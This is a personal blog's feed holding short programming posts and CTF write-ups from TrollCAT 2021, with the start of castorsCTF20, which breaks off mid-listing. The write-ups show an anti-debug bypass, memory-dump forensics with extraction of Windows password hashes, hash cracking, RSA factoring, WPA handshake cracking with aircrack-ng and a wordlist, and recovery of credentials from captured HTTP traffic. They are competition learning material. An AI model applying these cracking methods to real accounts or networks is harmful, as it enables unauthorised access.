Jekyll2025-01-30T04:44:05+00:00/feed.xmlThe ultimate solution to the nightmare of truncated tab titles2021-11-14T00:00:00+00:002021-11-14T00:00:00+00:00/programming/2021/11/14/title-directionProblem
I think we’ve all been in this situation: whilst navigating the pages of a website, following links by opening new tabs, we ultimately end up with an unnavigable mess:
Now luckily for me I use Tree Style Tab which means that I can change the direction of text inside of tabs (in the preferences) so that I can now see which pages I’m navigating:
Except this obviously doesn’t work for other websites:
We have a problem. Let’s fix it!
It seemed to me like the solution was standardisation, either everyone writes their titles so that they are readable when the text in the tab bar is left-aligned or everyone writes them so that they are readable right-aligned.
After some thoughts I came to the conclusion that it was preferable that all text inside of tab bars be written such that is was readable when the text was right-aligned (like for the PostgreSQL website) because it allows the text to be written in a coherent hierarchy: from general to more specific (like is used for dates, paths, and paths) and because the (only?) reason some websites have the more specific information at the start of their title is so that it is visible when the right side of the title is truncated.
We still have a problem.
It isn’t practical to go against the web’s (4.88 billion users) unstoppable momentum: the standardisation dream would involve having to convince everyone to rewrite their website titles such that they are readable right-aligned and convince browser vendors to display titles differently, something that is just simply impossible and even if it was possible, it wouldn’t necessarily be beneficial.
A second solution would be to have a per site configuration: either allow websites to indicate how they wish their title to be displayed or have an external database that is loaded on the client side using a browser extension or by the browser itself.
Neither solutions seem within reach, the first would require extending some kind of web standard, the second requires convincing browser vendors (and effectively extending the web standard) to make some changes as there are currently no APIs to change text direction from an extension.
Panacea
Except we don’t need to. Everything mentioned so far assumes that there is currently no way to change the alignment of text in tab bars, but in fact there is, and I’ve hinted at it by referring to “text direction”, because the solution is that:
Websites that use right-to-left scripts (like Arabic and Hebrew), have the text within title bar right-aligned.
And so this leads us to our solution:
<title>‏Nils's website - The ultimate solution to the nightmare of truncated tab titles</title>
With this added to web developer’s tool belt, hopefully some day, we will never have to click on 3 different tabs before finding the want we seek.
All credit goes to my friend Pranav, who after I mentioned the problem to him thought about right-to-left scripts and then was able to make it work.
]]>Explicit actions imply intent, prefer implicit actions2021-08-28T00:00:00+00:002021-08-28T00:00:00+00:00/programming/2021/08/28/implicit-explicitSoftware development (as well as many things in life) is all about making choices, one of them is deciding whether to do things in an implicit or explicit way.
Generally (based on my personal experience) the explicit option is the one that people recommend taking because it doesn’t require knowledge of the implicit behaviour and is more likely to be forward compatible.
For example, this could be when specifying arguments to a function, cli, etc. specifying the same values as the default values even though not specifying that argument at all would result in the same behaviour. Or in expressions, adding brackets for precedence even though it is not needed:
// Here the brackets are superfluousboolperform_action=(timestamp==current_time)?object.has_changed():timestamp==0;
However, I believe that expressing things implicitly would be better in many of these cases because when expressing things explicitly an intent is implied: it is implied there is a reason why the thing in question is defined explicitly. “Why would someone go out of their way to do something?”.
I believe that this implied intent can lead to confusion. For example it can make someone believe the default is not what it is, or the operator precedence is not in the order it actually is and as a result, the implicit option is preferable in some if not most of these cases.
Additionally, the implicit option also saves time when developing.
If for some reason, the implicit way is not clear enough, documentation (mainly through comments) I believe is a better solution than bearing this implied intent and in the case of forward compatibility, often the new default is what you want; if not, upgrading is usually trivial.
To conclude, in software development clarity is something that we want to maximise, and I believe that more often than people think doing things implicitly is the way to go about that.
Although this post was written in the context of software development the implied intent of being explicit also applies to different areas of life.
]]>TrollCAT CTF 2021 write-ups2021-02-06T00:00:00+00:002021-02-06T00:00:00+00:00/ctf/writeup/2021/02/06/trollcat21This weekend, my team, Pwnzorz, and I played in TrollCAT CTF 2021 and came in second placed. Here are my write-ups for the challenges I solved. If anything needs clarification, you are both welcome and encouraged to contact me.
When running file on the executable, we can see that it is stripped:
$ file crackme
crackme: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f4599ab6673e44ee040c43849f7af66cd81a3d45, for GNU/Linux 3.2.0, stripped
Which means there are are no symbols to help us, including to find the main function. I opened the binary in Ghidra and to find the main function, started with with the entry point:
voidentry(undefined8param_1,undefined8param_2,undefined8param_3){undefined8in_stack_00000000;undefinedauStack8[8];__libc_start_main(FUN_001017b6,in_stack_00000000,&stack0x00000008,FUN_00101880,FUN_001018e0,param_3,auStack8);do{// WARNING: Do nothing block with infinite loop}while(true);}
Here the main function is the first argument of __libc_start_main, (which we can now rename to main inside of Ghidra).
Looking at its decompilation, we can see that the main function takes input from the user, gives it to a function (I’ll rename check) along side with the length of the input and if the check function returns something else than a zero it prints the flag to the user.
undefined8main(void){intiVar1;undefined8uStack288;undefinedlocal_118[264];ssize_tlocal_10;uStack288=0x1017d2;printf("Enter key: ");uStack288=0x1017eb;local_10=read(0,local_118,0xff);if(local_10!=0){local_118[local_10+-1]=0;}uStack288=0x101820;iVar1=FUN_00101738(local_118,local_10+-1,local_10+-1);if(iVar1==0){uStack288=0x10186f;puts("Invalid key");}else{uStack288=0x101835;printf("Congrats here is your flag: ");uStack288=0x10184b;iVar1=open("/flag",0);uStack288=0x101861;sendfile(1,iVar1,(off_t*)0x0,0x100);}return0;}
This means that what we want to achieve is that the check function, given our input, returns a non-zero value.
Looking at the decompilation of the check function, we can see that it calls 2 functions with parameters 1. the length of the user input 2. some global variables. It then compares the user input with one of the global variables and if they both match, return 1, otherwise return 0.
Because the functions called inside of check are only dependent on the length of the user input and not the user input itself, we don’t have to understand how the 2 functions affect the global variables; we can just see (using a debugger) what the value of the global variable is, and then give that as user input.
So I ran the binary inside of gdb but something unexpected happened: when breaking on the main function (identified because it is the first parameter of __libc_start_main, and therefore its address is located in the rdi register when __libc_start_main is called), our breakpoint would never be reached but we would still be asked to enter the key:
To understand where I was, I pressed CTRL-C when the input was given and saw the following backtrace:
► f 0 7ffff7ebeec2 read+18
f 1 555555555393
f 2 5555555554af
f 3 5555555558c5
f 4 7ffff7df60de __libc_start_main+126
Looking inside of Ghidra what those addresses corresponded to:
voidFUN_0010141a(void){longlVar1;setvbuf(stdin,(char*)0x0,2,0);setvbuf(stdout,(char*)0x0,2,0);setvbuf(stderr,(char*)0x0,2,0);alarm(0x30);lVar1=ptrace(PTRACE_TRACEME,0,0,0);if(lVar1<0){FUN_001011e5();// WARNING: Subroutine does not returnexit(0);}return;}
We can see that inside of the second function, it uses ptrace to see if the process is already traced which would be the case if it ran inside of a debugger. If this anti debugging function detects that the process is traced, it runs another function (a fake main) and then exists, otherwise it continues (to the main function).
So what I did is change the value returned by ptrace so that the fake main function isn’t executed and I then printed the value of the global variable that the user input is compared to in check.
Here 0x555555555767 (first breakpoint) is the address where the second function is called inside of the check function. 0x5555555554a0 is where the value returned by ptrace is checked and 0x5555555580d0 is the address of the variable.
We can now use that value against the remote instance and get the flag:
Forensics
Forbidden (100 pts 111 solves)
Description
Agent Troll recieved some file but not able to read the data can you help us?
The repetition of “BZh9” caught my attention as it looked oddly familiar. I searched it up and the first result was a link to the Wikipedia page for bzip2. Considering the bzip2 part didn’t seem to start at the beginning of the file (the file starts with “CAR1”), I decided to use binwalk to make the process easier:
We have caught Mr.EvilPepo and now it is time for you to investigate him we searched his house and we got not much proof we got some report from OSINT department and Our OSINT Investigator told us that he mentioned on his socials “Hack Me if you can, i use same password Everywhere” we have dumped his computer memory and for further investigation we need your help. he typed the flag command somewhere and now he forgot it. can you find it?
The link is a download for a file, evilpepo.vmem.7z. The presence of mem suggests that it is a memory dump; time to use volatility!
After extracting it using 7z (7z x evilpepo.vmem.7z), I started off with the usual imageinfo in order to detect the type of dump it was and, most importantly, to get a profile:
$ volatility -f evilpepo.vmem imageinfo
Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418
AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/nils/Downloads/evilpepo.vmem)
PAE type : No PAE
DTB : 0x187000L
KDBG : 0xf80002a3f0a0L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0xfffff80002a40d00L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2021-01-12 13:22:41 UTC+0000
Image local date and time : 2021-01-12 18:52:41 +0530
The mention of “command” in the challenge description suggested that it had something to do with a command typed into cmd.exe, so I ran the consoles plug-in:
$ volatility -f evilpepo.vmem --profile=Win7SP1x64 consoles
**************************************************
ConsoleProcess: conhost.exe Pid: 992
Console: 0xff346200 CommandHistorySize: 50
HistoryBufferCount: 1 HistoryBufferMax: 4
OriginalTitle: Command Prompt
Title: Command Prompt
AttachedProcess: cmd.exe Pid: 1492 Handle: 0x60
----
CommandHistory: 0x39eb60 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 37 LastAdded: 36 LastDisplayed: 36
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x60
Cmd #0 at 0x37e550: helo
Cmd #1 at 0x37e570: troollll
Cmd #2 at 0x37e590: caaat
Cmd #3 at 0x37e5b0: yooooo
Cmd #4 at 0x39de90: T
Cmd #5 at 0x39dcd0: r
Cmd #6 at 0x3a2f00: o
Cmd #7 at 0x3a2f20: l
Cmd #8 at 0x3a2f40: c
Cmd #9 at 0x3a2f60: a
Cmd #10 at 0x3a2fb0: t
Cmd #11 at 0x3a2fc0: {
Cmd #12 at 0x3a2fd0: c
Cmd #13 at 0x3a2fe0: o
Cmd #14 at 0x3a2ff0: m
Cmd #15 at 0x3a3000: a
Cmd #16 at 0x3a3010: n
Cmd #17 at 0x3a3020: d
Cmd #18 at 0x3a3030: s
Cmd #19 at 0x3a3040: _
Cmd #20 at 0x3a3050: 4
Cmd #21 at 0x3a3060: r
Cmd #22 at 0x3a3070: 3
Cmd #23 at 0x3a3080: _
Cmd #24 at 0x3a3090: i
Cmd #25 at 0x3a30a0: m
Cmd #26 at 0x3a30b0: p
Cmd #27 at 0x3a30c0: o
Cmd #28 at 0x3a30d0: r
Cmd #29 at 0x3a30e0: t
Cmd #30 at 0x3a30f0: a
Cmd #31 at 0x3a3100: n
Cmd #32 at 0x3a3110: t
Cmd #33 at 0x3a3120: }
Cmd #34 at 0x3a33b0: hope you got it
Cmd #35 at 0x377860: "are you trying to run strings?"
Cmd #36 at 0x3a33e0: lolololololol
----
Screen 0x381120 X:80 Y:300
Dump:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\WhiteWolf>helo
'helo' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>troollll
'troollll' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>caaat
'caaat' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>yooooo
'yooooo' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>T
'T' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>r
'r' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>o
'o' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>l
'l' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>l
'l' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>c
'c' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>a
'a' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>t
't' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>{
'{' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>c
'c' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>o
'o' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>m
'm' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>m
'm' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>a
'a' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>n
'n' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>d
'd' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>s
's' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>_
'_' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>4
'4' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>r
'r' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>3
'3' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>_
'_' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>i
'i' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>m
'm' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>p
'p' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>o
'o' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>r
'r' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>t
't' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>a
'a' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>n
'n' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>t
't' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>}
'}' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>hope you got it
'hope' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>"are you trying to run strings?"
'"are you trying to run strings?"' is not recognized as an internal or external
command,
operable program or batch file.
C:\Users\WhiteWolf>lolololololol
'lolololololol' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\WhiteWolf>
As can be seen from the output, the Mr. EvilPepo typed the flag one letter at a time into his console. The letters joined together on 1 line give us the flag:
Now After some good beating, Mr.EvilPepo saying he hides something on the internet. find it
Note: Use the file provided in Mr.EvilPepo Part-1
AUTHOR: WHITE_WOLF
3
The Top Secret file of Mr.EvilPepo is still not discovered this is your last mission of finding the top secret file related to Mr.EvilPepo Good Luck
Note: Use the file provided in Mr.EvilPepo Part-1
AUTHOR: WHITE_WOLF
Solution
The descriptions for Mr_evilpepo 2 & 3 are quite cryptic. They don’t really point in any direction so I solved them together, just exploring the memory dump.
I continued through the list of plug-ins (listed using volatility --help) and ran the clipboard plug-in:
The clipboard contained a link to a file hosted on mega.nz, which unfortunately was not complete. Then I decided to run strings on the memory image to find the full link:
The -e option allows to set a different encoding and l specifies 16-bit littlendian. I used it here because Windows is very fond of UTF-16.
I then looked for another instance of the mega link in the strings outputs:
$ grep mega.nz strings
https://mega.nz/file/m18HSSaJ#_4Gmn4aWnrKN2716fMdSQogECaGsS5kKkDAytocSCZM
mega.nz/file/m18HSSaJ#_4Gmn4aWnrKN2716fMdSQogECaGsS5kKkDAytocSCZMn and which is
governed
https://mega.nz/file/m18HSSaJ#_4Gmn4aWnrKN2716fMdSQogECaGsS5kKkDAytocSCZM
https://mega.nz/file/m18HSSaJ#_4Gmn4aWnrKN2716fMdSQogECaGsS5kKkDAytocSCZM
https://mega.nz/file/m18HSSaJ#_4Gmn4aWnrKN2716fMdSQogECaGsS5kKkDAytocSCZM008-2012
TrueCrypt Developers Association and which is governed
This linked to a file named secret which didn’t seem to have any known format. Looking at it through the entropy filter revealed that it was probably encrypted:
$ file secret
secret: data
This meant that some kind of key or password had to be found to be able to decrypt it.
Because the description of Mr_evilpepo_2 mentions “something [hidden] on the internet”, I looked at the volatility plug-ins that could have something to do with web browsing and I found iehistory:
We can see from the iehistory output that Mr. EvilPepo went on the Chrome and Firefox download pages, and that he looked at a few files that look suspicious:
mysecret.txt only contained the link to the secret file which we had already found.
In the filenames collected from iehistory, there were VeraCrypt files. Due to VeraCrypt being a fork of TrueCrypt, I tried running the volatility plug-ins for TrueCrypt (truecryptmaster, truecryptpassphrase & truecryptsummary), which unfortunately gave empty results:
I wasn’t sure if that was because these plug-ins were not designed to work with VeraCrypt (in addition to TrueCrypt) or because the data necessary for these plug-ins to work wasn’t present in the memory dump.
I then continued with the usual memory forensics procedures: psscan and hashdump. psscan revealed that KeePass.exe was running. So I tried to dump its memory with the hope of being able to find passwords in there. Unfortunately, that didn’t bring anything fruitful.
Running hashdump revealed some hashes, however, after running them through John the Ripper, they turned out the be empty (or so I thought).
$ volatility -f evilpepo.vmem --profile=Win7SP1x64 --output-file=hashdump hashdump
$ cat hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WhiteWolf:1000:aad3b435b51404eeaad3b435b51404ee:2e6a7cf5aabb33a044684dd9c97e88a7:::
$ john hashdump
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "LM-opencl"
Use the "--format=LM-opencl" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-opencl"
Use the "--format=NT-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 3 password hashes with no different salts (LM [DES 128/128 AVX])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 661 candidates buffered for the current salt, minimum 1024 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
(WhiteWolf)
(Guest)
(Administrator)
3g 0:00:00:00 DONE 2/3 (2021-02-06 18:36) 6.382g/s 72531p/s 72531c/s 217595C/s 123456..GATOR6
Use the "--show --format=LM" options to display all of the cracked passwords reliably
Session completed
I then continued through the list of volatility plug-ins in the hope of finding something interesting. I ran the screenshot plug-in which revealed that notepad was open, however, that brought nothing new to light as mysecret.txt was the opened file which we already knew the content of (the mega link).
I wasn’t making progress anymore, so I decided to search how to find credentials and passwords in a memory dump and I found a tutorial that used hivelist and hivedump to retrieve windows hashes. Not really knowing what to do, I ran them:
This tutorial used NTLM hashes instead of LANMAN ones and that’s when I realised that the NTLM hash for WhiteWolf wasn’t empty and that I had missed it when I ran hashdump earlier.
Using crackstation I cracked the password: abracadabra.
Now with a password in hand, I tried to decrypt the secret file with VeraCrypt. I went for VeraCrypt first because the file secret didn’t have any recognizable format so I didn’t think it would be possible to open it with KeePass.
This turned out to be the flag for Mr_evilpepo_3 which meant that something was meant by “something being hidden on the internet” other than just a file being hosted on mega.nz.
After running chromehistory & chromevisits with no output, I ran chromesearchterms which gave some results:
$ volatility --plugins ~/plugins -f evilpepo.vmem --profile=Win7SP1x64 chromesearchterms
Row ID Keyword ID URL ID Lowercase Entered Text
------ ---------- ------ ---------------------------------------------------------------- ----------------------------------------------------------------
26 2 54 trollcat memes trollcat memes
25 2 53 trollcat memes trollcat memes
24 2 52 trollcat memes trollcat memes
23 2 51 trollcat memes trollcat memes
22 2 50 trollcat memese trollcat memese
21 2 49 veracrypt veracrypt
20 2 45 keepass keepass
19 2 44 trollcats ctf trollcats ctf
18 2 39 keepass download keepass download
17 2 35 trollcats meme trollcats meme
16 2 32 trollcats meme trollcats meme
15 2 31 trollcats meme trollcats meme
14 2 30 trollcats meme trollcats meme
13 2 27 trollcats meme trollcats meme
12 2 26 trollcats ctf trollcats ctf
11 2 24 memes on ctf memes on ctf
10 2 19 password protected pastebin password protected pastebin
9 2 14 veracrypt veracrypt
8 2 13 truecrypt truecrypt
7 2 10 ctf memes ctf memes
6 2 9 ctf memes ctf memes
5 2 8 malware samplew malware samplew
4 2 7 malware malware
3 2 5 ctf memes ctf memes
2 2 2 trollcats ctf trollcats ctf
9 5135 13
Looking at the results, it seemed that Mr. EvilPepo had installed KeePass & VeraCrypt and had searched for memes. I thought that maybe some of these search terms were passwords. Something else that seemed interesting was “password protected pastebin”. In order to find if Mr. EvilPepo had been on some some kind of pastebin website, I searched for “paste” in the strings output that I had prepared earlier:
$ grep -i paste strings
...
Defuse Security's Encrypted Pastebin defuse.ca/b/sOOqp4UunTdD0oUjidJFlz location from history
...
Going on this link, the interface was a bit confusing, but eventually I inputted the password I had cracked earlier and clicked “Decrypt” which revealed the flag:
Cryptography
Radio Station Apocalypse (457 pts 34 solves)
Description
Bob is trying to stop a Apocalypse can u help him decode his output
This is an RSA challenge, as is implied by the name of the challenge which forms the acronym RSA. If we look at the content of the file given, we are given ct (the cihpertext, e, n and p - q`.
Because p x q = n, we can work out the value of p and q and then use RsaCtfTool to workout the plaintext. p - q is substitued by b for better clarity.
p - q = b
p x q = n
p = b + q
q x (b + q) = n
bq + q^2 = n
0 = q^2 + bq - n
We can then use the quadratic equation to workout the value of q, substituting a with 1 and c with -n;
>>> from math import isqrt
>>> c = -25368447768323504911600571988774494107818159082103458909402378375896888147122503938518591402940401613482043710928629612450119548224453500663121617535722112844472859040198762641907836363229969155712075958868854330020410559684508712810222293531147857306199021834554435068975911739307607540505629883798642466233546635096780559373979170475222394473493457660803818950607714830510840577490628849303933022437114380092662378432401109413796410640006146844170094240232072224662551989418393330140325743682017287713705780111627575953826016488999945470058220771848171583260999599619753854835899967952821690531655365651736970047327
>>> b = 13850705243110859039354321081017038361100285164728565071420492338985283998938739255457649493117185659009054998475484599174052182163568940357425209817392780314915968465598416149706099257132486744034100104272832634714470968608095808094711578599330447351992808756520378741868674695777659183569180981300608614286
>>> (-b + isqrt(b*b - 4*c)) // 2
152499890916776320998653744133858053858040491195676367580833765685801465668550782030624978780895730483048668416204723476732936549664363014792241110103591722802722925811679026916136070136123358563999687916468289972321939237538498300991215059941344271955912443135643418740974797112808138286922920053490440910781
>>> q = _
>>> (-b - isqrt(b*b - 4*c)) // 2
-166350596159887180038008065214875092219140776360404932652254258024786749667489521286082628274012916142057723414680208075906988731827931955149666319920984503117638894277277443065842169393255845308033788020741122607036410206146594109085926638540674719307905251892163797482843471808585797470492101034791049525067
>>> b + q
166350596159887180038008065214875092219140776360404932652254258024786749667489521286082628274012916142057723414680208075906988731827931955149666319920984503117638894277277443065842169393255845308033788020741122607036410206146594109085926638540674719307905251892163797482843471808585797470492101034791049525067
The second value of q is invalid because it is negative. We can now recover the flag with RsaCtfTool:
$ ./RsaCtfTool.py -n 25368447768323504911600571988774494107818159082103458909402378375896888147122503938518591402940401613482043710928629612450119548224453500663121617535722112844472859040198762641907836363229969155712075958868854330020410559684508712810222293531147857306199021834554435068975911739307607540505629883798642466233546635096780559373979170475222394473493457660803818950607714830510840577490628849303933022437114380092662378432401109413796410640006146844170094240232072224662551989418393330140325743682017287713705780111627575953826016488999945470058220771848171583260999599619753854835899967952821690531655365651736970047327 -q 152499890916776320998653744133858053858040491195676367580833765685801465668550782030624978780895730483048668416204723476732936549664363014792241110103591722802722925811679026916136070136123358563999687916468289972321939237538498300991215059941344271955912443135643418740974797112808138286922920053490440910781 -p 166350596159887180038008065214875092219140776360404932652254258024786749667489521286082628274012916142057723414680208075906988731827931955149666319920984503117638894277277443065842169393255845308033788020741122607036410206146594109085926638540674719307905251892163797482843471808585797470492101034791049525067 -e 65537 --uncipher 15927954374690152068700390298074593196253864077169207071831999310211243220084198633824761313226756137217716813832139827281860280786151119392571330914043785795154126460993477079312886238477507766509831010644388998659565303441719615131661670116956449101956505931748018171190878765731317846254607404813297135537090043417404895660853320127812799010027005785901634939020872408881201149711968120809368691413105318444873712717786940780346214959475833457688794871749017822337860503424073668090333543027469770960756536095503271163592383252371337847620140632398753943463160733918860277382675572411402618882039992721158705125550
private argument is not set, the private key will not be displayed, even if recovered.
Results for /tmp/tmppp_dbgob:
Unciphered data :
HEX : 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000054726f6c6c6361747b5235415f31735f6e30745f546834745f657a7a7a217d
INT (big endian) : 149204956497314283531004000320684448716640924972648922878294856785599275389
INT (little endian) : 15796296950557221415783762244626704143186169113285087066722606455844897452964263215436184675224001692315898503209630264108817821134614017492161331444317520492797791539292766800947714681482709495990343928210560879801674983399333011288367509272053239135934383481406159082629868176870350052856035395954404064497290589345884131037586767896214701297772275738237520867935196019143092985144518387329511892766048340328235533409456647218964988372542436526503309580941177438626896784235082191112827629976796687195880133295116412280987396840610920835224261701846594894665827049039141293688389375132934600845020652935017140322304
STR : b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Trollcat{R5A_1s_n0t_Th4t_ezzz!}'
Thanks to Uzay for helping to solve this challenge.
Networking
FREE WIFI (316 pts 69 solves)
Description
I left my raspberry at starbucks this morning, here is the captured traffic. Find me the Password of the wifi.
We are given a pcap containing WIFI traffic and are told to find the password. To crack the passphrase from a captured handshake (in order to be able to crack WPA a handshake must be captured) we can use aircrack-ng:
$ aircrack-ng -w ~/rockyou.txt ./hack1-01.cap
Here I used the popular rockyou wordlist as my password wordlist.
Flag
Trollcat{no1caredformelikejesus}
I am so sed (500 pts 1 solve (me 😊))
Description
My neighbour knew about our CTF and Rocked his password ! Please help me get access to the WIFI.
Reading the description of this challenge, it seemed similar to FREE WIFI: you were given a pcap and had to crack the password of the wifi network which the traffic came from. One thing that I noticed was that the neighbour “Rocked” the password, which is a reference to the rockyou wordlist. So I ran the same command as I did for FREE WIFI however the password was not found which meant that despite what I had inferred from the description, the password was not contained within the rockyou wordlist. I thought about applying rules, to the aforementioned list, however, considering how long it had taken to crack the password for FREE WIFI (about 5 minutes), I thought that adding on rules to the list would make the number of possible passwords too large and it would infeasible to crack it.
I moved on to another challenge as I didn’t know how to proceed.
After some time, I went back to the challenge and noticed something in the description, it mentioned that the “neighbour knew about our CTF”, insinuating that the password was changed in accordance to it. This suggested they had set their Wi-Fi password to the full flag (with the flag format). So I used sed to add the flag format to each password in the rockyou wordlist.
$ sed -e 's/^/TROLLCAT{/' -e 's/$/}/' ~/rockyou.txt > rockyou_troll.txt
Because the flag format was all in upper case letters (in the challenge description), I thought that it was likely that the password didn’t contain any lower case letters and used grep to shrink the wordlist and crack the password:
Flag format : username:password ( no – {} ) Author: dboidembla
Solution
When opening the pcap in wireshark, there are 338410 packets, way too many for all of them to analysed. Looking at the description, I figured that the most likely way for credentials to be sent over the network by “granny” was over HTTP, and more specifically, a HTTP POST request. So I used the filter http.request.method == "POST" to filter only POST requests, leaving only 5 remaining packets…
All of the POST requests were to testphp.vulnweb.com/userinfo.php and had a uname and pass field:
Using CyberChef, it was possible to modify the uname and pass until they looked a bit more natural. In this case the correct password was in the last 2 requests (they’re the same):
]]>castorsCTF20 write-ups2020-05-31T00:00:00+00:002020-05-31T00:00:00+00:00/ctf/writeup/2020/05/31/castorsCTF20This weekend, with my team Pwnzorz, we played castorsCTF20, we ended up in first place and here are my writeups for the challenges I solved. If there’s anything that’s unclear, please send me an email or ask me on discord (or any platform you can find me on).
Crypto
Stalk Market (495 pts 18 solves)
Description:
Author: hasu
nc chals20.cybercastors.com 14423
A file server.py is attached:
importsocketserverfromosimporturandomfromrandomimportseed,randintfromsecretimportFLAGBANNER=b"""
______ ______ ______ __ __ __ __ __ ______ ______ __ __ ______ ______
/\ ___\/\__ _/\ __ \/\ \ /\ \/ / /\ "-./ \/\ __ \/\ == \/\ \/ / /\ ___/\__ _\
\ \___ \/_/\ \\\ \ __ \ \ \___\ \ _"-. \ \ \-./\ \ \ __ \ \ __<\ \ _"-\ \ __\/_/\ \/
\/\_____\ \ \_\\\ \_\ \_\ \_____\ \_\ \_\ \ \_\ \ \_\ \_\ \_\ \_\ \_\ \_\ \_\ \_____\\\ \_\
\/_____/ \/_/ \/_/\/_/\/_____/\/_/\/_/ \/_/ \/_/\/_/\/_/\/_/ /_/\/_/\/_/\/_____/ \/_/
"""MESSAGE=b"""
Breaking news!
The algorithm that generates turnip prices has been data mined.
All prices for the week are generated on Monday at midnight.
Understand how the algorithm works and predict prizes for
